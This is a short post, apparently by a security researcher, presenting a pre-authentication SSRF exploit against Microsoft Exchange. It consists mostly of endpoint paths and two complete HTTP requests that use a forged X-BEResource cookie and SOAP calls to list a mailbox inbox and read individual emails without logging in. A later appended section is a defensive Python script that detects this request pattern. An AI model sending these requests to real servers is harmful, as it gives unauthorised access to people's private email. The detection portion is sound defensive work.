Pre-Auth SSRF To Full MailBox Access (Microsoft Exchange Server Exploit)

Exploitation:

https://autodiscover.redacted.com/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/powershell
/mapi/emsmdb
/autodiscover/autodiscover.xml
/ews/exchange.asmx
/owa/auth/Current/
/ecp/default.flt
/ecp/favicon.ico
Request used to list the contents of a mailbox inbox without authentication:

POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1128

<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
    xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
    xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
    xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
    xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
  <soap:Header>
    <t:RequestServerVersion Version="Exchange2016" />
  </soap:Header>
  <soap:Body>
    <m:FindItem Traversal='Shallow'>
      <m:ItemShape>
        <t:BaseShape>AllProperties</t:BaseShape>
      </m:ItemShape>
      <m:ParentFolderIds>
        <t:DistinguishedFolderId Id='inbox'>
          <t:Mailbox>
            <t:EmailAddress>info@redacted.com</t:EmailAddress>
          </t:Mailbox>
        </t:DistinguishedFolderId>
      </m:ParentFolderIds>
    </m:FindItem>
  </soap:Body>
</soap:Envelope>
Payload used to retrieve individual emails without authentication:

POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1062

<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope
    xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
    xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
    xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
    xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
  <soap:Header>
    <t:RequestServerVersion Version="Exchange2016" />
  </soap:Header>
  <soap:Body>
    <m:GetItem Traversal='Shallow'>
      <m:ItemShape>
        <t:BaseShape>AllProperties</t:BaseShape>
      </m:ItemShape>
      <m:ItemIds>
        <t:ItemId Id="ItemID" ChangeKey="Changekey" />
      </m:ItemIds>
    </m:GetItem>
  </soap:Body>
</soap:Envelope>
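A defender-side check for the request shape shown above, added here as an example and not part of the original post. It parses raw HTTP requests (constructed sample traffic using example.test hosts) and flags the two indicators visible in the payloads: a client-supplied X-BEResource routing cookie that names a backend host and port, and a SOAP body posted to a static resource path such as /ecp/favicon.ico.

```python
import re

# Constructed sample traffic (not captured from a real server): one request shaped
# like the payloads above and one ordinary OWA request that should not be flagged.
SAMPLE_REQUESTS = [
    "POST /ecp/favicon.ico HTTP/1.1\r\nHost: autodiscover.example.test\r\n"
    "Content-Type: text/xml\r\n"
    "Cookie: X-BEResource=[:[@mail.example.test:444/ews/exchange.asmx#~1\r\n\r\n"
    "<?xml version='1.0'?><soap:Envelope><m:FindItem/></soap:Envelope>",
    "GET /owa/auth/logon.aspx HTTP/1.1\r\nHost: mail.example.test\r\n"
    "Cookie: ClientId=abc123\r\n\r\n",
]

BACKEND_RE = re.compile(r"X-BEResource=([^;\r\n]+)")
STATIC_EXT = (".ico", ".flt", ".css", ".js", ".png", ".gif")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def backend_target(cookie_value):
    """Return (host, port, path) named in an X-BEResource cookie, or None."""
    m = BACKEND_RE.search(cookie_value)
    if not m:
        return None
    # The routing value has the form "<prefix>@host:port/path#~version"; the part
    # after the last '@' and before '#' is what the front end would connect to.
    target = m.group(1).rsplit("@", 1)[-1].split("#", 1)[0]
    hostport, _, path = target.partition("/")
    host, _, port = hostport.partition(":")
    return host, int(port) if port.isdigit() else None, "/" + path

def classify(raw):
    """Return a list of reasons a request looks like the SSRF pattern (empty if clean)."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    target = backend_target(headers.get("cookie", ""))
    if target:
        reasons.append("client-supplied backend route X-BEResource -> %s:%s%s" % target)
    if (path.lower().endswith(STATIC_EXT) and "xml" in headers.get("content-type", "")
            and "<soap:envelope" in body.lower()):
        reasons.append("SOAP body posted to static resource " + path)
    return reasons

def scan(requests):
    """Return [(path, reasons)] for every request that triggers at least one rule."""
    return [(parse_request(r)[1], classify(r)) for r in requests if classify(r)]
```

In a real deployment the same rules would run over IIS or reverse-proxy logs that record the Cookie header, since the front-end request path alone (a static resource) looks harmless.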

17 Y/o | OSCP | OSWE | Security Researcher | Twitter: VanshalG

Vanshal Gaur